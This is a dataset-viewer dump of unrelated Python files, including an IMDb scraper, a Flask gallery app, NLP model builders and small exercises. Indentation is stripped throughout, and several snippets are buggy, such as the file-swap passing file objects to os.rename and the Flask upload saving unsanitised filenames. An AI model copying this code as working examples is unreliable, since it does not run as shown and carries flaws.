while c<p:
print(task[c],"=",status[c])
c=c+1
user=input("enter that what you want to do ? ")
if user=="eadit":
status5=input("enter the status : ")
status.append(status5)
print(status[c])
c=c+1
|
18,787 | 3726fb6e976a18abd6f4eb283016ca8553854de5 | #! /usr/bin/python
# -*- coding: utf-8 -*-
__author__ = ("Onur Kuru", "Osman Baskaya")
__date__ ="$Sep 20, 2011 00:43:16 AM$"
""" Movie Recommendation Systems """
from sys import stderr
try:
from imdb import IMDb
except ImportError:
stderr.write("imdbpy module does not exist " +
"please make sure this module installed correctly.\n")
exit(1)
from os import remove, path
from pickle import dump
import cProfile
persons = ['Steven Spielberg','Ridley Scott','Robert De Niro',
'Robin Williams', 'Mel Gibson','Jim Carrey']
genres = ['comedy','history','sci-fi','drama','thriller','fantasy', 'western']
# our algorithm needs these in reversed order.
persons.reverse()
genres.reverse()
hash_table = dict()
ia = IMDb()
def remove_old_files(filelist):
"""This method helps to remove old files like db and hash_dump"""
for filename in filelist:
if path.exists(filename):
try:
remove(filename)
print "%s deleted" % filename
except Exception: #TODO Exception spesifik.
stderr.write("%s cannot remove. Please check your priviledge\n"
% filename)
exit(1)
remove_old_files(('db.txt', 'hash_dump.txt'))
#def fetch_movies(person, genre):
#print "processing %s, %s" % (person, genre)
#movies = get_movies(person, genre)
#return movies
def get_movies(imdb_person, genre):
any_error = False
print "processing %s, %s" % (imdb_person, genre)
try:
all_work = imdb_person['genres'][genre]
except KeyError:
stderr.write("%s has no movie for %s\n" % (imdb_person, genre))
any_error = True
if not any_error:
movies = [[work.movieID, work.data['title'].encode('utf-8'), imdb_person['name'].encode('utf-8'), genre] for work in all_work if work['kind'] == u'movie' ]
yield movies
def update_hash(movies):
for movie in movies:
hash_table[movie[0]] = movie
def search_update_person(person):
imdb_person = ia.search_person(person, results=2)[0]
ia.update(imdb_person, info='genres links')
print "%s updated" % person
return imdb_person
def write_movies_to_db(movies):
f = open('db.txt', 'a+')
for movie in movies:
line = ','.join(movie) + '\n'
f.write(line)
f.close()
def main():
for person in persons:
imdb_person = search_update_person(person)
for genre in genres:
for movies in get_movies(imdb_person, genre):
if movies:
write_movies_to_db(movies)
update_hash(movies)
dump(hash_table, open('hash_dump.txt', 'w'))
if __name__ == '__main__':
cProfile.run('main()')
|
18,788 | 777e203473355db8f31d6ee11d752c2704b542ef | #Author: Spencer Dant
#Python Programming
#7/28/2018
#Exchanging two files
import os
#This is the cheating way to do it
def cheating(data1,data2):
os.rename(data2, 'temp')
os.rename(data1, data2)
os.rename('temp', data1)
#This creates a temperary file to store the first file
#for copying
def copying(data1,data2):
temp_file = open("temp.txt", 'r+')
#first => temp
for line_str in data1:
temp_file.write(line_str)
#second => first
for line_str in data2:
data1.write(line_str)
#temp => second
for line_str in temp_file:
data2.write(line_str)
#closes temp file
temp_file.close
#inputs with exception handling
file1 = input("Enter name for first file: ")
try:
data_file1 = open (file1, 'r+')
except FileNotFoundError:
print("The file", file1, "Does not exsist")
file2 = input("Enter name for second file: ")
try:
data_file2 = open(file2, 'r+')
except FileNotFoundError:
print("The file", file2, "Does not exsist")
#calls cheating function
cheating(data_file1,data_file2)
#calls copying function
copying(data_file1,data_file2)
#closes files
data_file1.close
data_file2.close
|
18,789 | 8cbade59da25745c26ea476348e6dee505e1dc97 | from collections import *
from itertools import *
from random import *
from time import *
def main():
ans = 0
for i in range(1000):
if i%3 == 0 or i%5 == 0:
ans += i
print(ans)
start = time()
main()
print('Program took %.02f seconds' % (time()-start)) |
18,790 | 395c516e65077dea222c7f877e3a9729d925c267 | from django.db import models
from django.urls import reverse
from authentication.models import User
class Application(models.Model):
name = models.CharField(max_length=32)
token = models.CharField(max_length=128)
author = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('app-detail', args=[self.pk])
class Error(models.Model):
app = models.ForeignKey(Application, on_delete=models.CASCADE, related_name='errors')
date = models.DateTimeField()
type = models.CharField(max_length=128)
message = models.TextField()
stacktrace = models.TextField()
def __str__(self):
return '{},{}'.format(self.type, self.date)
|
18,791 | dc0f6b9198e2a6c6148ffd604579e905c7f35eb0 | from matplotlib import pyplot as plt
x = [1,2,3,4]
y = [3,3,3,3]
plt.plot(x,y)
plt.title('Light Intensity vs. Kinetic Energy ')
plt.ylabel('Kinetic Energy')
plt.xlabel('Light Intensity')
plt.show()
print("plancks constant =6.6^10-34")
h =6.624*10**-34
c=3*10**8
print("enter frequency ")
f=float(input())
#print("enter kinetic energy")
#k=float(input())
#print("enter wavelength in nm")
#l=float(input())
print("enter mass of body")
m=int(input())
print("enter velocity of paerticle")
v=int(input())
w=-(h*f-0.5*m*v*v)
#w=-((h*c)/(l*10**-9)-k)
print("work function =",w,"ev")
tf=(w*1.6*10**-19)/h
print("threshold frequency=",tf,"Hz")
|
18,792 | 612fb8f0ed07bfdb5a6fdcfb4fae3724ebf81686 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import smallsmilhandler
import urllib.request
import json
from xml.sax import make_parser
class Karaokelocal:
def __init__(self, fichero):
try:
fichero = sys.argv[1]
parser = make_parser()
cHandler = smallsmilhandler.SmallSMILHandler()
parser.setContentHandler(cHandler)
parser.parse(open(fichero))
self.lista = cHandler.get_tags()
except FileNotFoundError:
sys.exit('file not found')
"""
abrimos ficheros y creamos la clase
karaokelocal heredando el programa
SmallSMILHandlerrealizado anteriormente
"""
def __str__(self):
"""
ordena y coloca lo que tenemos en karaoke.smil
para que salga de salida lo que nos pide
"""
line = ''
for linea in self.lista:
for atributo in linea:
if linea[atributo] != "":
line += atributo + "=" + "'" + linea[atributo] + "'" + '\t'
line += '\n'
return line
def to_json(self, smil):
ficherojs = ''
if ficherojs == '':
ficherojs = smil.replace('.smil', '.json')
with open(ficherojs, 'w') as filejson:
json.dump(self.lista, filejson, indent=4)
def do_local(self):
for linea in self.lista:
for atributo in linea:
if linea[atributo][0:7] == 'http://':
direction = linea[atributo].split('/')[-1]
urllib.request.urlretrieve(linea[atributo])
linea[atributo] = direction
"""
modifica el valor del atributo correspondiente,indicando
ahora su localizacion local
"""
if __name__ == "__main__":
"""
Programa principal
"""
try:
fichero = sys.argv[1]
karaoke = Karaokelocal(fichero)
except():
sys.exit('usage error: python3 karaoke.py file smil')
print(karaoke)
karaoke.to_json(fichero)
karaoke.do_local()
karaoke.to_json('local.smil')
print(karaoke)
|
18,793 | 76ead94a4a50d3c0ccdcb288e5960181cd9491ee | a = 'spartacodingclub@naver.com'
def find_email(e):
return e.split('@')[1].split('.')[0]
print(find_email(a))
|
18,794 | 8e5afe7677f5e1fbe47d7abdfc017a20a88b8c61 | from datetime import datetime
import os
from flask import request, render_template, redirect, Blueprint,session
from member import GalleryService, Gallery
service = GalleryService()
bp = Blueprint('gallery', __name__, url_prefix='/gallery')
@bp.route('/list')
def list():
glist = service.getAll()
return render_template('gallery/list.html', glist=glist)
@bp.route('/add')
def addForm():
return render_template('gallery/form.html')
@bp.route('/add', methods=['POST'])
def upload():
title = request.form['gall_title']
writer = request.form['gall_writer']
content = request.form['gall_content']
upload_path = 'static/img/'
f = request.files['gall_img']
fname = upload_path+f.filename #f.filename : 업로드된 파일 명
f.save(fname)
fname = '/' + fname
service.addBoard(Gallery(gall_writer=writer, gall_title=title, gall_content=content, gall_img=fname))
return redirect('/gallery/list')
# num = g.gall_num
# dir = 'static/img/' + str(num) + '/'
# os.mkdir(dir) # 이미지를 담을 디렉토리 생성
# f = []
# f.append(request.files['gall_img'])
# print(f)
# names= [] #업로드 파일의 새 이름
# for i in f:
# arr = f[i].filename.split('.')
# fileExtent = arr[len(arr)-1]
# fname = dir+'p_'+str(i+1)+'.'+fileExtent
# f[i].save(fname)
# names.append('/'+fname)
@bp.route('/detail/<int:gall_num>')
def detail(gall_num):
g = service.getBoard(gall_num)
if g.gall_writer == session['login_id']:
flag = True
msg = ''
else:
flag = False
msg = 'readonly'
return render_template('gallery/detail.html', g=g)
# @bp.route('/getbywriter/<string:gall_writer>')
# def detail(gall_writer):
# glist = service.getByWriter(gall_writer)
# return render_template('gallery/list.html', glist=glist)
# @bp.route('/getbytitle/<string:gall_title>')
# def detail(gall_title):
# glist = service.getByTitle(gall_title)
# return render_template('gallery/list.html', glist=glist)
@bp.route('/edit/<int:gall_num>')
def editPage(gall_num):
g = service.getBoard(gall_num)
return render_template('gallery/edit.html', g=g)
@bp.route('/edit', methods=['POST'])
def edit():
num = request.form['gall_num']
title = request.form['gall_title']
content = request.form['gall_content']
date = datetime.now()
service.editBoard(Gallery(gall_num=num, gall_date=date, gall_title=title, gall_content=content))
print("### route:", num,date,title,content)
return render_template('gallery/list.html')
return redirect('/gallery/list')
# @bp.route('/edit', methods=['POST'])
# def edit():
# num = request.form['gall_num']
# title = request.form['gall_title']
# content = request.form['gall_content']
# date = datetime.now()
# # service.editBoard(Gallery(gall_num=num, gall_date=date, gall_title=title, gall_content=content))
# service.editBoard(num, date, title, content)
# print("### route:", num,date,title,content)
# return redirect('/gallery/list')
@bp.route('/editDone', methods=['POST'])
def editDone(gall_num):
g = service.getBoard(gall_num)
return render_template('gallery/list.html', g=g)
@bp.route('/del', methods=['POST'])
def delGallery():
# num = request.args.get('gall_num', default=0, type=int)
# service.delBoard(num)
# return redirect('/gallery/list')
gall_num = request.form['gall_num']
service.delBoard(gall_num)
return redirect('/gallery/list')
# @bp.route('/list')
# def listPage():
# page = request.args.get('page', type=int, default=1)
# gallery_list = Gallery.query.order_by(Gallery.gall_num.desc())
# gallery_list = gallery_list.paginate(page, per_page=5)
# return render_template('gallery/list.html', gallery_list=gallery_list) |
18,795 | 36a41a7e4a9278e14844eeae03ffbd1a742d96c1 | import torch
from torch import nn
import numpy as np
import os
import yaml
from pytorch_pretrained_bert import BertModel
from transformers import XLNetModel
from src.aspect_category_model.recurrent_capsnet import RecurrentCapsuleNetwork
from src.aspect_category_model.bert_capsnet import BertCapsuleNetwork
from src.aspect_category_model.bert_all import BertCNNNetwork, BertFcNetwork
from src.aspect_category_model.xlnet_all import XlnetFcNetwork, XlnetCNNNetwork, XlnetCapsuleNetwork
def make_model(config):
model_type = config['aspect_category_model']['type']
if model_type == 'recurrent_capsnet':
return make_recurrent_capsule_network(config)
elif 'bert' in model_type:
return make_bert_all_network(config)
elif 'xlnet' in model_type:
return make_xlnet_all_network(config)
def make_xlnet_all_network(config):
base_path = os.path.join(config['base_path'])
log_path = os.path.join(base_path, 'log/log.yml')
log = yaml.safe_load(open(log_path))
model_type = config['aspect_category_model']['type']
config = config['aspect_category_model'][model_type]
xlnet_path = '/home/xuwd/data/xlnet_cased_L-12_H-768_A-12/'
xlnet = XLNetModel.from_pretrained(xlnet_path)
if model_type == 'xlnet_fc':
model = XlnetFcNetwork(
xlnet=xlnet,
xlnet_size=config['xlnet_size'],
dropout=config['dropout'],
hidden_size=config['hidden_size'],
num_categories=log['num_categories']
)
elif model_type == 'xlnet_cnn':
model = XlnetCNNNetwork(
xlnet=xlnet,
xlnet_size=config['xlnet_size'],
dropout=config['dropout'],
cnn_size=config['cnn_size'],
filter_size=config['filter_size'],
filter_nums=config['filter_nums'],
num_categories=log['num_categories']
)
elif model_type == 'xlnet_capsule':
model = XlnetCapsuleNetwork(
xlnet=xlnet,
xlnet_size=config['xlnet_size'],
capsule_size=config['capsule_size'],
dropout=config['dropout'],
num_categories=log['num_categories']
)
return model
def make_bert_all_network(config):
base_path = os.path.join(config['base_path'])
log_path = os.path.join(base_path, 'log/log.yml')
log = yaml.safe_load(open(log_path))
model_type = config['aspect_category_model']['type']
config = config['aspect_category_model'][model_type]
bert_path = '/home/xuwd/data/bert-base-uncased/'
bert = BertModel.from_pretrained(bert_path)
if model_type == 'bert_capsnet':
model = BertCapsuleNetwork(
bert=bert,
bert_size=config['bert_size'],
capsule_size=config['capsule_size'],
dropout=config['dropout'],
num_categories=log['num_categories']
)
model.load_sentiment(os.path.join(base_path, 'processed/sentiment_matrix1.npy'))
elif model_type == 'bert_cnn':
model = BertCNNNetwork(
bert=bert,
bert_size=config['bert_size'],
dropout=config['dropout'],
cnn_size=config['cnn_size'],
filter_size=config['filter_size'],
filter_nums=config['filter_nums'],
num_categories=log['num_categories']
)
elif model_type == 'bert_fc':
model = BertFcNetwork(
bert=bert,
bert_size=config['bert_size'],
dropout=config['dropout'],
cnn_size=config['cnn_size'],
num_categories=log['num_categories']
)
return model
'''
def make_model(config):
model_type = config['aspect_category_model']['type']
if model_type == 'recurrent_capsnet':
return make_recurrent_capsule_network(config)
elif model_type == 'bert_capsnet':
return make_bert_capsule_network(config)
elif 'bert' in model_type:
return make_bert_all_network(config)
def make_bert_all_network(config):
base_path = os.path.join(config['base_path'])
log_path = os.path.join(base_path, 'log/log.yml')
log = yaml.safe_load(open(log_path))
model_type = config['aspect_category_model']['type']
config = config['aspect_category_model'][model_type]
bert_path = '/home/xuwd/data/bert-base-uncased/'
bert = BertModel.from_pretrained(bert_path)
if model_type == 'bert_cnn':
model = BertCNNNetwork(
bert=bert,
bert_size=config['bert_size'],
dropout=config['dropout'],
cnn_size=config['cnn_size'],
filter_size=config['filter_size'],
filter_nums=config['filter_nums'],
num_categories=log['num_categories']
)
elif model_type == 'bert_fc':
model = BertFcNetwork(
bert=bert,
bert_size=config['bert_size'],
dropout=config['dropout'],
cnn_size=config['cnn_size'],
num_categories=log['num_categories']
)
return model
'''
def make_bert_fc_network(config):
base_path = os.path.join(config['base_path'])
log_path = os.path.join(base_path, 'log/log.yml')
log = yaml.safe_load(open(log_path))
config = config['aspect_category_model'][config['aspect_category_model']['type']]
bert_path = '/home/xuwd/data/bert-base-uncased/'
bert = BertModel.from_pretrained(bert_path)
model = BertFcNetwork(
bert=bert,
bert_size=config['bert_size'],
dropout=config['dropout'],
cnn_size=config['cnn_size'],
num_categories=log['num_categories']
)
# model.load_sentiment(os.path.join(base_path, 'processed/sentiment_matrix.npy'))
return model
def make_bert_cnn_network(config):
base_path = os.path.join(config['base_path'])
log_path = os.path.join(base_path, 'log/log.yml')
log = yaml.safe_load(open(log_path))
config = config['aspect_category_model'][config['aspect_category_model']['type']]
print(config)
bert_path = '/home/xuwd/data/bert-base-uncased/'
bert = BertModel.from_pretrained(bert_path)
print("hrere")
model = BertCNNNetwork(
bert=bert,
bert_size=config['bert_size'],
dropout=config['dropout'],
cnn_size=config['cnn_size'],
filter_size=config['filter_size'],
filter_nums=config['filter_nums'],
num_categories=log['num_categories']
)
# model.load_sentiment(os.path.join(base_path, 'processed/sentiment_matrix.npy'))
return model
def make_bert_capsule_network(config):
base_path = os.path.join(config['base_path'])
log_path = os.path.join(base_path, 'log/log.yml')
log = yaml.safe_load(open(log_path))
config = config['aspect_category_model'][config['aspect_category_model']['type']]
bert = BertModel.from_pretrained('bert-base-uncased')
model = BertCapsuleNetwork(
bert=bert,
bert_size=config['bert_size'],
capsule_size=config['capsule_size'],
dropout=config['dropout'],
num_categories=log['num_categories']
)
model.load_sentiment(os.path.join(base_path, 'processed/sentiment_matrix.npy'))
return model
def make_recurrent_capsule_network(config):
embedding = make_embedding(config)
base_path = os.path.join(config['base_path'])
log_path = os.path.join(base_path, 'log/log.yml')
log = yaml.safe_load(open(log_path))
config = config['aspect_category_model'][config['aspect_category_model']['type']]
aspect_embedding = nn.Embedding(num_embeddings=8, embedding_dim=config['embed_size'])
model = RecurrentCapsuleNetwork(
embedding=embedding,
aspect_embedding=aspect_embedding,
num_layers=config['num_layers'],
bidirectional=config['bidirectional'],
capsule_size=config['capsule_size'],
dropout=config['dropout'],
num_categories=log['num_categories']
)
model.load_sentiment(os.path.join(base_path, 'processed/sentiment_matrix.npy'))
return model
def make_embedding(config):
base_path = os.path.join(config['base_path'])
log_path = os.path.join(base_path, 'log/log.yml')
log = yaml.safe_load(open(log_path))
vocab_size = log['vocab_size']
config = config['aspect_category_model'][config['aspect_category_model']['type']]
embed_size = config['embed_size']
embedding = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embed_size)
glove = np.load(os.path.join(base_path, 'processed/glove.npy'))
embedding.weight.data.copy_(torch.tensor(glove))
return embedding |
18,796 | 758370b185673f27d9b7660765deacdb145571b8 | ## Website:: Leetfree, Interviewbit
## Link:: https://www.interviewbit.com/problems/median-of-array/
## Topic:: Binary search
## Sub-topic::
## Difficulty:: Hard
## Approach::
## Time complexity:: O(log(M+N))
## Space complexity:: O(1)
## Notes::
## Bookmarked:: Yes
import bisect
class Solution:
def find_median(self, arr1, arr2, target):
lo, hi = 0, len(arr1)
while lo < hi:
mid = (lo + hi) // 2
pl = bisect.bisect_left(arr2, arr1[mid])
pr = bisect.bisect_right(arr2, arr1[mid])
minn, maxn = mid + pl, mid + pr
if minn <= target <= maxn:
return arr1[mid]
elif maxn < target:
lo = mid + 1
else:
hi = mid
def findMedianSortedArrays(self, A, B):
la, lb = len(A), len(B)
l = la + lb
median1, median2 = 0, 0
target = l // 2
median1 = self.find_median(A, B, target)
if median1 is None: median1 = self.find_median(B, A, target)
if l % 2 == 1:
return int(median1)
median2 = self.find_median(A, B, target - 1)
if median2 is None: median2 = self.find_median(B, A, target - 1)
ans = (median1 + median2) / 2.
# print('tw', median1, median2, ans)
return ans
|
18,797 | 52413791e06d7415c17f244f5e230af021e8bef0 | import random
print(random.random())
print(random.randint(0, 10))
print(random.randrange(0, 10, 2))
print(random.uniform(1, 10))
print(random.gammavariate(15, 20)) |
18,798 | 1c7f4264e00e6706bebfcd8c80806ad73f02a21e | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 17 09:52:30 2021
@author: xochipilli
"""
#%%#############################################################################
# Dependencias
#!pip install torch==1.7.0+cu101 torchvision==0.8.1+cu101 torchaudio==0.7.0 -f https://download.pytorch.org/whl/torch_stable.html
import pandas as pd
import matplotlib.pyplot as plt
import time
# Dependencias
import sys
import os
import seaborn as sns
#%%#############################################################################
# Cosas para editar
## Donde correr
functionspath = 'E:/tiempo/Codigo/Funciones/'
sys.path.insert(0, functionspath)
from Functions_figures import (get_data,figure_all)
basepath = 'E:/tiempo/Resultados/' # Para CP 1 | 1 y 2
UsarTF = False
# en basepath deben estar los archivos, el script de funciones,
## Que condiciones analizar
#filename = 'awake'
#filename = 'keta'
#filename = 'sleep'
# Load all scv result files
model_complexity = 1
NC = [1]
keta_c1,sh_keta_c1 = get_data(basepath,'keta',NC,model_complexity,False )
awake_c1,sh_awake_c1 = get_data(basepath,'awake',NC ,model_complexity,False )
sleep_c1,sh_sleep_c1 = get_data(basepath,'sleep',NC ,model_complexity,False )
# NC =[1,2]
# keta_c12,sh_keta_c12 = get_data(basepath,'keta', NC ,model_complexity,False )
# awake_c12,sh_awake_c12 = get_data(basepath,'awake', NC ,model_complexity,False )
# sleep_c12,sh_sleep_c12 = get_data(basepath,'sleep', NC ,model_complexity,False )
NC =[1,2,3]
keta_c123,sh_keta_c123 = get_data(basepath,'keta', NC ,model_complexity,False )
awake_c123,sh_awake_c123 = get_data(basepath,'awake', NC ,model_complexity,False )
sleep_c123,sh_sleep_c123 = get_data(basepath,'sleep', NC ,model_complexity,False )
savepath = 'E:/tiempo/Figuras/Raw_MCx_'+str(model_complexity)
if UsarTF == True: # Si e
savepath = savepath +"_TF"
if not os.path.exists(savepath):
os.makedirs(savepath)
variable,tvar,chivar = 'A',100,50
figure_all(awake_c123,sh_awake_c123,variable,tvar,chivar,savepath,'ACC_awake_123')
figure_all(keta_c123,sh_keta_c123,variable,tvar,chivar,savepath,'ACC_keta_123')
figure_all(sleep_c123,sh_sleep_c123 ,variable,tvar,chivar,savepath,'ACC_sleep_123')
# figure_all(awake_c12,sh_awake_c12,variable,tvar,chivar,savepath,'ACC_awake_12')
# figure_all(keta_c12,sh_keta_c12,variable,tvar,chivar,savepath,'ACC_keta_12')
# figure_all(sleep_c12,sh_sleep_c12 ,variable,tvar,chivar,savepath,'ACC_sleep_12')
figure_all(awake_c1,sh_awake_c1,variable,tvar,chivar,savepath,'ACC_awake_1')
figure_all(keta_c1,sh_keta_c1,variable,tvar,chivar,savepath,'ACC_keta_1')
figure_all(sleep_c1,sh_sleep_c1 ,variable,tvar,chivar,savepath,'ACC_sleep_1')
variable,tvar,chivar = 'auc',1,0.4
figure_all(awake_c123,sh_awake_c123,variable,tvar,chivar,savepath,'AUC_awake_123')
figure_all(keta_c123,sh_keta_c123,variable,tvar,chivar,savepath,'AUC_keta_123')
figure_all(sleep_c123,sh_sleep_c123 ,variable,tvar,chivar,savepath,'AUC_sleep_123')
# figure_all(awake_c12,sh_awake_c12,variable,tvar,chivar,savepath,'AUC_awake_12')
# figure_all(keta_c12,sh_keta_c12,variable,tvar,chivar,savepath,'AUC_keta_12')
# figure_all(sleep_c12,sh_sleep_c12 ,variable,tvar,chivar,savepath,'AUC_sleep_12')
figure_all(awake_c1,sh_awake_c1,variable,tvar,chivar,savepath,'AUC_awake_1')
figure_all(keta_c1,sh_keta_c1,variable,tvar,chivar,savepath,'AUC_keta_1')
figure_all(sleep_c1,sh_sleep_c1 ,variable,tvar,chivar,savepath,'AUC_sleep_1')
variable,tvar,chivar = 'L',3,0
figure_all(awake_c123,sh_awake_c123,variable,tvar,chivar,savepath,'Loss_awake_123')
figure_all(keta_c123,sh_keta_c123,variable,tvar,chivar,savepath,'Loss_keta_123')
figure_all(sleep_c123,sh_sleep_c123 ,variable,tvar,chivar,savepath,'Loss_sleep_123')
# figure_all(awake_c12,sh_awake_c12,variable,tvar,chivar,savepath,'Loss_awake_12')
# figure_all(keta_c12,sh_keta_c12,variable,tvar,chivar,savepath,'Loss_keta_12')
# figure_all(sleep_c12,sh_sleep_c12 ,variable,tvar,chivar,savepath,'Loss_sleep_12')
figure_all(awake_c1,sh_awake_c1,variable,tvar,chivar,savepath,'Loss_awake_1')
figure_all(keta_c1,sh_keta_c1,variable,tvar,chivar,savepath,'Loss_keta_1')
figure_all(sleep_c1,sh_sleep_c1 ,variable,tvar,chivar,savepath,'Loss_sleep_1')
# fig, ax = plt.subplots(figsize=(8,6))
# bp = dfline.groupby('Iteration').plot()
# plt.close('all')
# plt.figure()
# plt.xlabel('epoca', fontsize=20);
# plt.ylim([0, 3])
# plt.scatter(dfline['epoca'],dfline['TL'],c='blue',alpha=0.3)
# plt.scatter(dfline['epoca'],dfline['VL'],c='red',alpha=0.3)
# ax = df.plot(secondary_y=['TL', 'VL'])
# g =sns.scatterplot(x="epoca", y="value", hue="variable",
# data=dfline,alpha=0.3) |
18,799 | cea445538d963e681c40e432bdd3b62bd066ee5e | import heapq
def solution(food_times, k):
if sum(food_times) <= k:
return -1
q = []
for i in range(len(food_times)):
heapq.heappush(q, (food_times[i], i + 1))
pre_value = 0
length = len(food_times)
while q:
time = (q[0][0] - pre_value) * length
if k >= time:
k -= time
pre_value, _ = heapq.heappop(q)
length -= 1
else:
idx = k % length
q.sort(key=lambda x: x[1])
return q[idx][1]
food = [3, 1, 2]
k = 5
print(solution(food, k))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.